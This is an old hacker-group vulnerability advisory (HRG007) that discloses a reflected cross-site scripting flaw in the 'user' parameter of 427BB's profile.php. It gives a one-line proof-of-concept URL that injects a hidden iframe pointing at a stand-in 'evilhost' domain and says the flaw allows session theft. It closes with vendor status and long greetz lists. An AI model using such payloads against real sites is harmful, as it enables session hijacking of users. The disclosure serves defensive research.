[][][][][][][][][][][][][][][][][][][][][][][][][][] [][][] [] [] HRG - Hackerlounge Research Group [] Release: HRG007 [] Monday 03/01/05 [] 427BB [] [] The author can't be held responsible for any damage [] done by a reader. You have your own resonsibility [] Please use this document like it's meant to. [] [][][][][][][][][][][][][][][][][][][][][][][][][][] [][][] Vulnerable: 427BB (Any Version) --- General Information: 427BB Is a simple board and I have no idea why I'm releasing this because Its Very unpopular But I said What the hell. Its based on PHP And MySQL --- Description: In profile.php there is a user var that is vulnerable to a XSS attack by a remote attacker. The user string isn't filtered of < > or ". This makes is very easy for a attacker to steal a session and many other things. --- PoC Code Place the following code into the the url then reload the profile page and it will execute this code. profile.php?user=%3Ciframe%20src=http://www.evilhost.com%20height=1%20width=1%3E%3C/iframe%3E This is very unsafe and vuln because you can execute any code you would like and can lead to manger damage of the forum you are attacking. --- Fix and Vendor status: Vendor has been notified, expect official patch soon. --- Greetz: All the people at hackerlounge.com, JWT, TGS-Security.com and JWT-Security.net. Specifically: Th3_R@v3n (me), Dlab, Riddick, Enjoi, Blademaster, Modzilla, Pingu, Jake Johnson, Afterburn, airo, cardiaC, chis, ComputerGeek, deep_phreeze, dudley, evasion, eXtacy, Mattewan, Afterburn, Thanatos_Starfire, Roz, Sirross, UmInAsHoE, Infinite, Slarty, NoUse, Snake (I hate you), Surreal (I hate you), -=Vanguard=-, The_IRS, puNKiey, driedice, Carnuss, oKiDaN, Mr.Mind, dementis, net-RIDER, voteforpedro, Cryptic_Override, kodaxx, ~CreEpy~NoDquE~, Brainscan, the_exode, phillysteak12345, DerrtyJake, =>HeX<=, m0rk, and anyone else I forgot. --- Credit: HRG - Hackerlounge Research Group http://www.Hackerlounge.com Partial credit is also given to lancastertechnologies.org, founded by JWT. [][][][][][][][][][][][][][][][][][][][][][][][][][] [][][] [] [] HRG - Hackerlounge Research Group [] Release: HRG007 [] Monday 03/01/05 [] 427BB [] [] The author can't be held responsible for any damage [] done by a reader. You have your own resonsibility [] Please use this document like it's meant to. [] [][][][][][][][][][][][][][][][][][][][][][][][][][] [][][]